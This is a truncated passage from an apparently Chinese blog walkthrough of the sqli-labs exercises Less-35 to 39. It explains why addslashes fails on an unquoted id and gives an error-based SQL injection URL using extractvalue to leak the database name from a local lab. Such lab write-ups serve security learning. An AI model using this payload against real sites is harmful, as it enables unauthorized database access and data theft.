LESS-35-36-37-38-39

LESS-35 由於id沒有被單引號括起來所以addslashes起不到作用所以俺正常提交即可。 輸入: http://127.0.0.1/sqlilabs/Less-35/?id=-1 and extractvalue(1,concat(0x7e,(select database()),0x7e))–+ less-36 本體的本質和前面相同不過採用的是MySQL_real_escape_stri
本站公眾號
   歡迎關注本站公眾號,獲取更多信息